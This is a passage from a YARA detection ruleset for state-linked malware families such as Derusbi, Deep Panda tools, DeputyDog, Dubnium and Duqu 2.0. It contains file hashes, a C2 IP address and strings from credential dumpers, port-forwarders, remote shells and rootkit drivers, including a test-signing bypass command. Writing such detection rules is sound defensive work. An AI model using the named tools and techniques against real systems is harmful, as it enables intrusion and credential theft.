        hash = "ffb1d8ea3039d3d5eb7196d27f5450cac0ea4f34"
    strings:
        // strings of the Foundstone ScanLine tool; all are required
        $s0 = "Command line port scanner" fullword wide
        $s1 = "sl.exe" fullword wide
        $s2 = "CPports.txt" fullword ascii
        $s3 = ",GET / HTTP/.}" fullword ascii
        $s4 = "Foundstone Inc." fullword wide
        $s9 = " 2002 Foundstone Inc." fullword wide
        $s15 = ", Inc. 2002" fullword ascii
        $s20 = "ICMP Time" fullword ascii
    condition:
        all of them
}

rule Anthem_DeepPanda_lot1
{
    meta:
        description = "Anthem Hack Deep Panda - lot1.tmp-pwdump"
        author = "Florian Roth"
        date = "2015/02/08"
        hash = "5d201a0fb0f4a96cefc5f73effb61acff9c818e1"
    strings:
        // error / status messages of a pwdump-style credential dumper
        $s0 = "Unable to open target process: %d, pid %d" fullword ascii
        $s1 = "Couldn't delete target executable from remote machine: %d" fullword ascii
        $s2 = "Target: Failed to load SAM functions." fullword ascii
        $s5 = "Error writing the test file %s, skipping this share" fullword ascii
        $s6 = "Failed to create service (%s/%s), error %d" fullword ascii
        $s8 = "Service start failed: %d (%s/%s)" fullword ascii
        $s12 = "PwDump.exe" fullword ascii
        $s13 = "GetAvailableWriteableShare returned an error of %ld" fullword ascii
        $s14 = ":\\\\.\\pipe\\%s" fullword ascii
        $s15 = "Couldn't copy %s to destination %s. (Error %d)" fullword ascii
        $s16 = "dump logon session" fullword ascii
        $s17 = "Timed out waiting to get our pipe back" fullword ascii
        $s19 = "SetNamedPipeHandleState failed, error %d" fullword ascii
        $s20 = "%s\\%s.exe" fullword ascii
    condition:
        10 of them
}

rule Anthem_DeepPanda_htran_exe
{
    meta:
        description = "Anthem Hack Deep Panda - htran-exe"
        author = "Florian Roth"
        date = "2015/02/08"
        hash = "38e21f0b87b3052b536408fdf59185f8b3d210b9"
    strings:
        // usage text and log messages of the htran port-forwarder
        $s0 = "%s -<listen|tran|slave> <option> [-log logfile]" fullword ascii
        $s1 = "[-] Gethostbyname(%s) error:%s" fullword ascii
        $s2 = "e:\\VS 2008 Project\\htran\\Release\\htran.pdb" fullword ascii
        $s3 = "[SERVER]connection to %s:%d error" fullword ascii
        $s4 = "-tran <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
        $s5 = "[-] ERROR: Must supply logfile name." fullword ascii
        $s6 = "[-] There is a error...Create a new connection." fullword ascii
        $s7 = "[+] Accept a Client on port %d from %s" fullword ascii
        $s8 = "======================== htran V%s =======================" fullword ascii
        $s9 = "[-] Socket Listen error."
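fullword ascii
        $s10 = "[-] ERROR: open logfile" fullword ascii
        $s11 = "-slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
        $s12 = "[+] Make a Connection to %s:%d ......" fullword ascii
        $s14 = "Recv %5d bytes from %s:%d" fullword ascii
        $s15 = "[+] OK! I Closed The Two Socket." fullword ascii
        $s16 = "[+] Waiting another Client on port:%d...." fullword ascii
        $s17 = "[+] Accept a Client on port %d from %s ......" fullword ascii
        $s20 = "-listen <ConnectPort> <TransmitPort>" fullword ascii
    condition:
        10 of them
}

rule Anthem_DeepPanda_Trojan_Kakfum
{
    meta:
        description = "Anthem Hack Deep Panda - Trojan.Kakfum sqlsrv32.dll"
        author = "Florian Roth"
        date = "2015/02/08"
        hash1 = "ab58b6aa7dcc25d8f6e4b70a24e0ccede0d5f6129df02a9e61293c1d7d7640a2"
        hash2 = "c6c3bb72896f8f0b9a5351614fd94e889864cf924b40a318c79560bbbcfa372f"
    strings:
        // svchost service-group persistence under the name "sqlserver"
        $s0 = "%SystemRoot%\\System32\\svchost.exe -k sqlserver" fullword ascii
        $s1 = "%s\\sqlsrv32.dll" fullword ascii
        $s2 = "%s\\sqlsrv64.dll" fullword ascii
        $s3 = "%s\\%d.tmp" fullword ascii
        $s4 = "ServiceMaix" fullword ascii
        $s15 = "sqlserver" fullword ascii
    condition:
        all of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

import "pe"

rule APT_DeputyDog_Fexel
{
    meta:
        author = "ThreatConnect Intelligence Research Team"
    strings:
        $180 = "180.150.228.102" wide ascii
        // "%08x08x\0", then UTF-16LE "\cmd.exe", a 2-6 byte gap, then UTF-16LE "Can't open shell!"
        $0808cmd = {25 30 38 78 30 38 78 00 5C 00 63 00 6D 00 64 00 2E 00 65 00 78 00 65 [2-6] 43 00 61 00 6E 00 27 00 74 00 20 00 6F 00 70 00 65 00 6E 00 20 00 73 00 68 00 65 00 6C 00 6C 00 21}
        $cUp = "Upload failed! [Remote error code:" nocase wide ascii
        // NUL-delimited "DGGYDSYRL" marker
        $DGGYDSYRL = {00 44 47 47 59 44 53 59 52 4C 00}
        $GDGSYDLYR = "GDGSYDLYR_%" wide ascii
    condition:
        any of them
}

rule APT_DeputyDog
{
    meta:
        Author = "FireEye Labs"
        Date = "2013/09/21"
        Description = "detects string seen in samples used in 2013-3893 0day attacks"
        Reference = "https://www.fireeye.com/blog/threat-research/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html"
    strings:
        $mz = {4d 5a}
        $a = "DGGYDSYRL"
    condition:
        ($mz at 0) and $a
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

/* Derusbi (Linux and Windows variants), rules by @seifreed.
   ELF magic is the bytes 7F 45 4C 46, which read as little-endian uint32 0x464C457F
   (the same constant apt_nix_elf_Derusbi_Linux_SharedMemCreation below uses). */

rule apt_nix_elf_derusbi
{
    meta:
        Author = "@seifreed"
    strings:
        // anonymous strings: the condition only uses "all of them"
        $ = "LxMain"
        $ = "execve"
        $ = "kill"
        $ = "cp -a %s %s"
        $ = "%s &"
        $ = "dbus-daemon"
        $ = "--noprofile"
        $ = "--norc"
        $ = "TERM=vt100"
        $ = "/proc/%u/cmdline"
        $ = "loadso"
        $ = "/proc/self/exe"
        $ = "Proxy-Connection: Keep-Alive"
        $ = "Connection: Keep-Alive"
        $ = "CONNECT %s"
        $ = "HOST: %s:%d"
        $ = "User-Agent: Mozilla/4.0"
        $ = "Proxy-Authorization: Basic %s"
        $ = "Server: Apache"
        $ = "Proxy-Authenticate"
        $ = "gettimeofday"
        $ = "pthread_create"
        $ = "pthread_join"
        $ = "pthread_mutex_init"
        $ = "pthread_mutex_destroy"
        $ = "pthread_mutex_lock"
        $ = "getsockopt"
        $ = "socket"
        $ = "setsockopt"
        $ = "select"
        $ = "bind"
        $ = "shutdown"
        $ = "listen"
        $ = "opendir"
        $ = "readdir"
        $ = "closedir"
        $ = "rename"
    condition:
        // FIX: the constant was 0x4464c457f (a 36-bit value with an extra leading
        // "4"); uint32(0) can never equal it, so the rule could not match anything.
        // 0x464C457F is the ELF magic as a little-endian uint32.
        (uint32(0) == 0x464C457F) and (all of them)
}

rule apt_nix_elf_derusbi_kernelModule
{
    meta:
        Author = "@seifreed"
    strings:
        // kernel-module symbol and modinfo strings, including the pid-hiding exports
        $ = "__this_module"
        $ = "init_module"
        $ = "unhide_pid"
        $ = "is_hidden_pid"
        $ = "clear_hidden_pid"
        $ = "hide_pid"
        $ = "license"
        $ = "description"
        $ = "srcversion="
        $ = "depends="
        $ = "vermagic="
        $ = "current_task"
        $ = "sock_release"
        $ = "module_layout"
        $ = "init_uts_ns"
        $ = "init_net"
        $ = "init_task"
        $ = "filp_open"
        $ = "__netlink_kernel_create"
        $ = "kfree_skb"
    condition:
        // FIX: same dead constant (0x4464c457f) as in apt_nix_elf_derusbi; corrected
        // to the ELF magic so the rule can actually fire on ELF input.
        (uint32(0) == 0x464C457F) and (all of them)
}

rule apt_nix_elf_Derusbi_Linux_SharedMemCreation
{
    meta:
        Author = "@seifreed"
    strings:
        $byte1 = { B6 03 00 00 ?? 40 00 00 00 ?? 0D 5F 01 82 }
    condition:
        (uint32(0) == 0x464C457F) and (any of them)
}

rule apt_nix_elf_Derusbi_Linux_Strings
{
    meta:
        Author = "@seifreed"
    strings:
        // $a*: variant-specific strings (shell prompt, shm id file, LxMain64)
        $a1 = "loadso" wide ascii fullword
        $a2 = "\nuname -a\n\n" wide ascii
        $a3 = "/dev/shm/.x11.id" wide ascii
        $a4 = "LxMain64" wide ascii nocase
        $a5 = "# \\u@\\h:\\w \\$ " wide ascii
        // $b*: generic supporting strings (alphabets, procfs paths, cp command)
        $b1 = "0123456789abcdefghijklmnopqrstuvwxyz" wide
        $b2 = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ" wide
        $b3 = "ret %d" wide fullword
        $b4 = "uname -a\n\n" wide ascii
        $b5 = "/proc/%u/cmdline" wide ascii
        $b6 = "/proc/self/exe" wide ascii
        $b7 = "cp -a %s %s" wide ascii
        // $c*: hard-coded pty and log paths
        $c1 = "/dev/pts/4" wide ascii fullword
        $c2 = "/tmp/1408.log" wide ascii fullword
    condition:
        uint32(0) == 0x464C457F and ((1 of ($a*) and 4 of ($b*)) or (1 of ($a*) and 1 of ($c*)) or 2 of ($a*) or all of ($b*))
}

rule apt_win_exe_trojan_derusbi
{
    meta:
        Author = "@seifreed"
    strings:
        // $sa_*: broad Windows/HTTP/driver strings; thirteen or all of them are
        // needed before the more specific groups below are consulted
        $sa_1 = "USB" wide ascii
        $sa_2 = "RAM" wide ascii
        $sa_3 = "SHARE" wide ascii
        $sa_4 = "HOST: %s:%d"
        $sa_5 = "POST"
        $sa_6 = "User-Agent: Mozilla"
        $sa_7 = "Proxy-Connection: Keep-Alive"
        $sa_8 = "Connection: Keep-Alive"
        $sa_9 = "Server: Apache"
        $sa_10 = "HTTP/1.1"
        $sa_11 = "ImagePath"
        $sa_12 = "ZwUnloadDriver"
        $sa_13 = "ZwLoadDriver"
        $sa_14 = "ServiceMain"
        $sa_15 = "regsvr32.exe"
        $sa_16 = "/s /u" wide ascii
        $sa_17 = "rand"
        $sa_18 = "_time64"
        $sa_19 = "DllRegisterServer"
        $sa_20 = "DllUnregisterServer"
        $sa_21 = { 8b [5] 8b ?? d3 ?? 83 ??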
08 30 [5] 40 3b [5] 72 } // Decode Driver $sb_1 = "PCC_CMD_PACKET" $sb_2 = "PCC_CMD" $sb_3 = "PCC_BASEMOD" $sb_4 = "PCC_PROXY" $sb_5 = "PCC_SYS" $sb_6 = "PCC_PROCESS" $sb_7 = "PCC_FILE" $sb_8 = "PCC_SOCK" $sc_1 = "bcdedit -set testsigning" wide ascii $sc_2 = "update.microsoft.com" wide ascii $sc_3 = "_crt_debugger_hook" wide ascii $sc_4 = "ue8G5" wide ascii $sd_1 = "NET" wide ascii $sd_2 = "\\\\.\\pipe\\%s" wide ascii $sd_3 = ".dat" wide ascii $sd_4 = "CONNECT %s:%d" wide ascii $sd_5 = "\\Device\\" wide ascii $se_1 = "-%s-%04d" wide ascii $se_2 = "-%04d" wide ascii $se_3 = "FAL" wide ascii $se_4 = "OK" wide ascii $se_5 = "2.03" wide ascii $se_6 = "XXXXXXXXXXXXXXX" wide ascii condition: (uint16(0) == 0x5A4D) and ( (all of ($sa_*)) or ((13 of ($sa_*)) and ( (5 of ($sb_*)) or (3 of ($sc_*)) or (all of ($sd_*)) or ( (1 of ($sc_*)) and (all of ($se_*)) ) ) ) ) } rule Trojan_Derusbi { meta: Author = "RSA_IR" Date = "4Sept13" File = "derusbi_variants v 1.3" MD5 = " c0d4c5b669cc5b51862db37e972d31ec " strings: $b1 = {8b 15 ?? ?? ?? ?? 8b ce d3 ea 83 c6 ?? 30 90 ?? ?? ?? ?? 40 3b 05 ?? ?? ?? ?? 72 ??} $b2 = {F3 5D 88 2E ?? ?? 00 00 BE 07 18 2E F0 5D 88 2E F7 5D 88 2E 0C A2 88 2E 4B 5D 88 2E F3 5D 88 2E} $b3 = {4E E6 40 BB} $b4 = {B1 19 BF 44} $b5 = {6A F5 44 3D ?? ?? 00 00 27 AF D4 3D 69 F5 44 3D 6E F5 44 3D 95 0A 44 3D D2 F5 44 3D 6A F5 44 3D} $b6 = {F3 5D 88 2E ?? ?? 00 00 BE 07 18 2E F0 5D 88 2E} $b7 = {D6 D5 A4 A3 ?? ?? 00 00 9B 8F 34 A3 D5 D5 A4 A3 D2 D5 A4 A3 29 2A A4 A3} $b8 = {C3 76 33 9F ?? ?? 
00 00 8E 2C A3 9F C0 76 33 9F C7 76 33 9F 3C 89 33 9F} condition: 2 of ($b1, $b2, $b3, $b4) and 1 of ($b5, $b6, $b7, $b8) } rule APT_Derusbi_DeepPanda { meta: author = "ThreatConnect Intelligence Research Team" reference = "http://www.crowdstrike.com/sites/default/files/AdversaryIntelligenceReport_DeepPanda_0.pdf" strings: $D = "Dom4!nUserP4ss" wide ascii condition: $D } rule APT_Derusbi_Gen { meta: author = "ThreatConnect Intelligence Research Team" strings: $2 = "273ce6-b29f-90d618c0" wide ascii $A = "Ace123dx" fullword wide ascii $A1 = "Ace123dxl!" fullword wide ascii $A2 = "Ace123dx!@#x" fullword wide ascii $C = "/Catelog/login1.asp" wide ascii $DF = "~DFTMP$$$$$.1" wide ascii $G = "GET /Query.asp?loginid=" wide ascii $L = "LoadConfigFromReg failded" wide ascii $L1 = "LoadConfigFromBuildin success" wide ascii $ph = "/photoe/photo.asp HTTP" wide ascii $PO = "POST /photos/photo.asp" wide ascii $PC = "PCC_IDENT" wide ascii condition: any of them } /* Yara Rule Set Author: Airbus Defence and Space Cybersecurity CSIRT - Fabien Perigaud Date: 2015-12-09 Reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family Identifier: Derusbi Dez 2015 */ rule derusbi_kernel { meta: description = "Derusbi Driver version" date = "2015-12-09" author = "Airbus Defence and Space Cybersecurity CSIRT - Fabien Perigaud" strings: $token1 = "$$$--Hello" $token2 = "Wrod--$$$" $cfg = "XXXXXXXXXXXXXXX" $class = ".?AVPCC_BASEMOD@@" $MZ = "MZ" condition: $MZ at 0 and $token1 and $token2 and $cfg and $class } rule derusbi_linux { meta: description = "Derusbi Server Linux version" date = "2015-12-09" author = "Airbus Defence and Space Cybersecurity CSIRT - Fabien Perigaud" strings: $PS1 = "PS1=RK# \\u@\\h:\\w \\$" $cmd = "unset LS_OPTIONS;uname -a" $pname = "[diskio]" $rkfile = "/tmp/.secure" $ELF = "\x7fELF" condition: $ELF at 0 and $PS1 and $cmd and $pname and $rkfile } /* Yara Rule Set Author: Florian Roth Date: 2015-12-15 Identifier: Derusbi Dez 2015 */ rule 
Derusbi_Kernel_Driver_WD_UDFS { meta: description = "Detects Derusbi Kernel Driver" author = "Florian Roth" reference = "http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family" date = "2015-12-15" score = 80 hash1 = "1b449121300b0188ff9f6a8c399fb818d0cf53fd36cf012e6908a2665a27f016" hash2 = "50174311e524b97ea5cb4f3ea571dd477d1f0eee06cd3ed73af39a15f3e6484a" hash3 = "6cdb65dbfb2c236b6d149fd9836cb484d0608ea082cf5bd88edde31ad11a0d58" hash4 = "e27fb16dce7fff714f4b05f2cef53e1919a34d7ec0e595f2eaa155861a213e59" strings: $x1 = "\\\\.\\pipe\\usbpcex%d" fullword wide $x2 = "\\\\.\\pipe\\usbpcg%d" fullword wide $x3 = "\\??\\pipe\\usbpcex%d" fullword wide $x4 = "\\??\\pipe\\usbpcg%d" fullword wide $x5 = "$$$--Hello" fullword ascii $x6 = "Wrod--$$$" fullword ascii $s1 = "\\Registry\\User\\%s\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" fullword wide $s2 = "Update.dll" fullword ascii $s3 = "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WMI" fullword wide $s4 = "\\Driver\\nsiproxy" fullword wide $s5 = "HOST: %s" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 800KB and (2 of ($x*) or all of ($s*)) } rule Derusbi_Code_Signing_Cert { meta: description = "Detects an executable signed with a certificate also used for Derusbi Trojan - suspicious" author = "Florian Roth" reference = "http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family" date = "2015-12-15" score = 40 strings: $s1 = "Fuqing Dawu Technology Co.,Ltd.0" fullword ascii $s2 = "XL Games Co.,Ltd.0" fullword ascii $s3 = "Wemade Entertainment co.,Ltd0" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 800KB and 1 of them } rule XOR_4byte_Key { meta: description = "Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan)" author = "Florian Roth" reference = "http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family" date = "2015-12-15" score = 60 strings: /* Op Code */ $s1 = { 
85 C9 74 0A 31 06 01 1E 83 C6 04 49 EB F2 } /* test ecx, ecx jz short loc_590170 xor [esi], eax add [esi], ebx add esi, 4 dec ecx jmp short loc_590162 */ condition: uint16(0) == 0x5a4d and filesize < 900KB and all of them } rule apt_win32_dll_bergard_pgv_pvid_variant { meta: copyright = "Fidelis Cybersecurity" reference = "http://www.threatgeek.com/2016/05/turbo-twist-two-64-bit-derusbi-strains-converge.html" strings: $ = "Accept:" $ = "User-Agent: %s" $ = "Host: %s:%d" $ = "Cache-Control: no-cache" $ = "Connection: Keep-Alive" $ = "Cookie: pgv_pvid=" $ = "Content-Type: application/x-octet-stream" $ = "User-Agent: %s" $ = "Host: %s:%d" $ = "Pragma: no-cache" $ = "Connection: Keep-Alive" $ = "HTTP/1.0" condition: (uint16(0) == 0x5A4D) and (all of them) } /* Yara Rule Set Author: Florian Roth Date: 2016-06-10 Identifier: Dubnium */ /* Rule Set ----------------------------------------------------------------- */ rule Dubnium_Sample_1 { meta: description = "Detects sample mentioned in the Dubnium Report" author = "Florian Roth" reference = "https://goo.gl/AW9Cuu" date = "2016-06-10" hash1 = "839baf85de657b6d6503b6f94054efa8841f667987a9c805eab94a85a859e1ba" strings: $key1 = "3b840e20e9555e9fb031c4ba1f1747ce25cc1d0ff664be676b9b4a90641ff194" fullword ascii $key2 = "90631f686a8c3dbc0703ffa353bc1fdf35774568ac62406f98a13ed8f47595fd" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 2000KB and all of them } rule Dubnium_Sample_2 { meta: description = "Detects sample mentioned in the Dubnium Report" author = "Florian Roth" reference = "https://goo.gl/AW9Cuu" date = "2016-06-10" hash1 = "5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b" strings: $x1 = ":*:::D:\\:c:~:" fullword ascii $s2 = "SPMUVR" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 2000KB and all of them ) } rule Dubnium_Sample_3 { meta: description = "Detects sample mentioned in the Dubnium Report" author = "Florian Roth" reference = "https://goo.gl/AW9Cuu" date = 
"2016-06-10" hash1 = "caefcdf2b4e5a928cdf9360b70960337f751ec4a5ab8c0b75851fc9a1ab507a8" hash2 = "e0362d319a8d0e13eda782a0d8da960dd96043e6cc3500faeae521d1747576e5" hash3 = "a77d1c452291a6f2f6ed89a4bac88dd03d38acde709b0061efd9f50e6d9f3827" strings: $x1 = "copy /y \"%s\" \"%s\" " fullword ascii $x2 = "del /f \"%s\" " fullword ascii $s1 = "del /f /ah \"%s\" " fullword ascii $s2 = "if exist \"%s\" goto Rept " fullword ascii $s3 = "\\*.*.lnk" fullword ascii $s4 = "Dropped" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 2000KB and 5 of them } rule Dubnium_Sample_5 { meta: description = "Detects sample mentioned in the Dubnium Report" author = "Florian Roth" reference = "https://goo.gl/AW9Cuu" date = "2016-06-10" super_rule = 1 hash1 = "16f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b" hash2 = "1feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8" hash3 = "41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf" hash4 = "5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b" hash5 = "5f07b074414513b73e202d7f77ec4bcf048f13dd735c9be3afcf25be818dc8e0" hash6 = "839baf85de657b6d6503b6f94054efa8841f667987a9c805eab94a85a859e1ba" hash7 = "a25715108d2859595959879ff50085bc85969e9473ecc3d26dda24c4a17822c9" hash8 = "bd780f4d56214c78045454d31d83ae18ed209cc138e75d138e72976a7ef9803f" hash9 = "e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b" strings: $s1 = "$innn[i$[i$^i[e[mdi[m$jf1Wehn[^Whl[^iin_hf$11mahZijnjbi[^[W[f1n$dej$[hn]1[W1ni1l[ic1j[mZjchl$$^he[[j[a[1_iWc[e[" fullword ascii $s2 = "h$YWdh[$ij7^e$n[[_[h[i[[[\\][1$1[[j1W1[1cjm1[$[k1ZW_$$ncn[[Inbnnc[I9enanid[fZCX" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 9000KB and all of them } rule Dubnium_Sample_6 { meta: description = "Detects sample mentioned in the Dubnium Report" author = "Florian Roth" reference = "https://goo.gl/AW9Cuu" date = "2016-06-10" super_rule = 1 hash1 = "5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b" 
hash2 = "5f07b074414513b73e202d7f77ec4bcf048f13dd735c9be3afcf25be818dc8e0" hash3 = "839baf85de657b6d6503b6f94054efa8841f667987a9c805eab94a85a859e1ba" strings: $s1 = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&()`~-_=+[{]{;',." fullword ascii $s2 = "e_$0[bW\\RZY\\jb\\ZY[nimiRc[jRZ]" fullword ascii $s3 = "f_RIdJ0W9RFb[$Fbc9[k_?Wn" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 4000KB and all of them } rule Dubnium_Sample_7 { meta: description = "Detects sample mentioned in the Dubnium Report" author = "Florian Roth" reference = "https://goo.gl/AW9Cuu" date = "2016-06-10" super_rule = 1 hash1 = "16f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b" hash2 = "1feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8" hash3 = "41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf" hash4 = "5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b" hash5 = "5f07b074414513b73e202d7f77ec4bcf048f13dd735c9be3afcf25be818dc8e0" hash6 = "a25715108d2859595959879ff50085bc85969e9473ecc3d26dda24c4a17822c9" hash7 = "bd780f4d56214c78045454d31d83ae18ed209cc138e75d138e72976a7ef9803f" hash8 = "e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b" strings: $s1 = "hWI[$lZ![nJ_[[lk[8Ihlo8ZiIl[[[$Ynk[f_8[88WWWJW[YWnl$$Z[ilf!$IZ$!W>Wl![W!k!$l!WoW8$nj8![8n_I^$[>_n[ZY[[Xhn_c!nnfK[!Z" fullword ascii $s2 = "[i_^])[$n!]Wj^,h[,!WZmk^o$dZ[h[e!&W!l[$nd[d&)^Z\\^[[iWh][[[jPYO[g$$e&n\\,Wfg$[<g$[[ninn:j!!)Wk[nj[[o!!Y" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 9000KB and all of them } rule Dubnium_Sample_SSHOpenSSL { meta: description = "Detects sample mentioned in the Dubnium Report" author = "Florian Roth" reference = "https://goo.gl/AW9Cuu" date = "2016-06-10" hash1 = "6f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b" hash2 = "feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8" hash3 = "41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf" hash4 = 
"bd780f4d56214c78045454d31d83ae18ed209cc138e75d138e72976a7ef9803f" hash5 = "a25715108d2859595959879ff50085bc85969e9473ecc3d26dda24c4a17822c9" hash6 = "e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b" strings: $s1 = "sshkeypairgen.exe" fullword wide $s2 = "OpenSSL: FATAL" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 9000KB and all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule apt_duqu2_loaders { meta: copyright = "Kaspersky Lab" description = "Rule to detect Duqu 2.0 samples" last_modified = "2015-06-09" version = "1.0" strings: $a1 = "{AAFFC4F0-E04B-4C7C-B40A-B45DE971E81E}" wide $a2 = "\\\\.\\pipe\\{AAFFC4F0-E04B-4C7C-B40A-B45DE971E81E}" wide $a4 = "\\\\.\\pipe\\{AB6172ED-8105-4996-9D2A-597B5F827501}" wide $a5 = "Global\\{B54E3268-DE1E-4c1e-A667-2596751403AD}" wide $a8 = "SELECT `Data` FROM `Binary` WHERE `Name`='%s%i'" wide $a9 = "SELECT `Data` FROM `Binary` WHERE `Name`='CryptHash%i'" wide $a7 = "SELECT `%s` FROM `%s` WHERE `%s`='CAData%i'" wide $b1 = "MSI.dll" $b2 = "msi.dll" $b3 = "StartAction" $c1 = "msisvc_32@" wide $c2 = "PROP=" wide $c3 = "-Embedding" wide $c4 = "S:(ML;;NW;;;LW)" wide $d1 = "NameTypeBinaryDataCustomActionActionSourceTargetInstallExecuteSequenceConditionSequencePropertyValueMicrosoftManufacturer" nocase $d2 = {2E 3F 41 56 3F 24 5F 42 69 6E 64 40 24 30 30 58 55 3F 24 5F 50 6D 66 5F 77 72 61 70 40 50 38 43 4C 52 ?? 40 40 41 45 58 58 5A 58 56 31 40 24 24 24 56 40 73 74 64 40 40 51 41 56 43 4C 52 ?? 
40 40 40 73 74 64 40 40} condition: ( (uint16(0) == 0x5a4d) and ( (any of ($a*)) or (all of ($b*)) or (all of ($c*)) ) and filesize < 100000 ) or ( (uint32(0) == 0xe011cfd0) and ( (any of ($a*)) or (all of ($b*)) or (all of ($c*)) or (any of ($d*)) ) and filesize < 20000000 ) } rule apt_duqu2_drivers { meta: copyright = "Kaspersky Lab" description = "Rule to detect Duqu 2.0 drivers" last_modified = "2015-06-09" version = "1.0" strings: $a1 = "\\DosDevices\\port_optimizer" wide nocase $a2 = "romanian.antihacker" $a3 = "PortOptimizerTermSrv" wide $a4 = "ugly.gorilla1" $b1 = "NdisIMCopySendCompletePerPacketInfo" $b2 = "NdisReEnumerateProtocolBindings" $b3 = "NdisOpenProtocolConfiguration" condition: uint16(0) == 0x5A4D and (any of ($a*) ) and (2 of ($b*)) and filesize < 100000 } /* Action Loader Samples --------------------------------------------------- */ rule Duqu2_Generic1 { meta: description = "Kaspersky APT Report - Duqu2 Sample - Generic Rule" author = "Florian Roth" reference = "https://goo.gl/7yKyOj" date = "2015-06-10" super_rule = 1 hash0 = "3f9168facb13429105a749d35569d1e91465d313" hash1 = "0a574234615fb2382d85cd6d1a250d6c437afecc" hash2 = "38447ed1d5e3454fe17699f86c0039f30cc64cde" hash3 = "5282d073ee1b3f6ce32222ccc2f6066e2ca9c172" hash4 = "edfca3f0196788f7fde22bd92a8817a957c10c52" hash5 = "6a4ffa6ca4d6fde8a30b6c8739785f4bd2b5c415" hash6 = "00170bf9983e70e8dd4f7afe3a92ce1d12664467" hash7 = "32f8689fd18c723339414618817edec6239b18f3" hash8 = "f860acec9920bc009a1ad5991f3d5871c2613672" hash9 = "413ba509e41c526373f991d1244bc7c7637d3e13" hash10 = "29cd99a9b6d11a09615b3f9ef63f1f3cffe7ead8" hash11 = "dfe1cb775719b529138e054e7246717304db00b1" strings: $s0 = "Global\\{B54E3268-DE1E-4c1e-A667-2596751403AD}" fullword wide $s1 = "SetSecurityDescriptorSacl" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 189 times */ $s2 = "msisvc_32@" fullword wide $s3 = "CompareStringA" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - 
occured 1392 times */ $s4 = "GetCommandLineW" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 1680 times */ condition: uint16(0) == 0x5a4d and filesize < 150KB and all of them } rule APT_Kaspersky_Duqu2_procexp { meta: description = "Kaspersky APT Report - Duqu2 Sample - Malicious MSI" author = "Florian Roth" reference = "https://goo.gl/7yKyOj" date = "2015-06-10" hash1 = "2422835716066b6bcecb045ddd4f1fbc9486667a" hash2 = "b120620b5d82b05fee2c2153ceaf305807fa9f79" hash3 = "288ebfe21a71f83b5575dfcc92242579fb13910d" strings: $x1 = "svcmsi_32.dll" fullword wide $x2 = "msi3_32.dll" fullword wide $x3 = "msi4_32.dll" fullword wide $x4 = "MSI.dll" fullword ascii $s1 = "SELECT `Data` FROM `Binary` WHERE `Name`='%s%i'" fullword wide $s2 = "Sysinternals installer" fullword wide /* PEStudio Blacklist: strings */ $s3 = "Process Explorer" fullword wide /* PEStudio Blacklist: strings */ /* Goodware String - occured 5 times */ condition: uint16(0) == 0x5a4d and filesize < 100KB and ( 1 of ($x*) ) and ( all of ($s*) ) } rule APT_Kaspersky_Duqu2_SamsungPrint { meta: description = "Kaspersky APT Report - Duqu2 Sample - file 2a9a5afc342cde12c6eb9a91ad29f7afdfd8f0fb17b983dcfddceccfbc17af69" author = "Florian Roth" reference = "https://goo.gl/7yKyOj" date = "2015-06-10" hash = "ce39f41eb4506805efca7993d3b0b506ab6776ca" strings: $s0 = "Installer for printer drivers and applications" fullword wide /* PEStudio Blacklist: strings */ $s1 = "msi4_32.dll" fullword wide $s2 = "HASHVAL" fullword wide $s3 = "SELECT `%s` FROM `%s` WHERE `%s`='CAData%i'" fullword wide $s4 = "ca.dll" fullword ascii 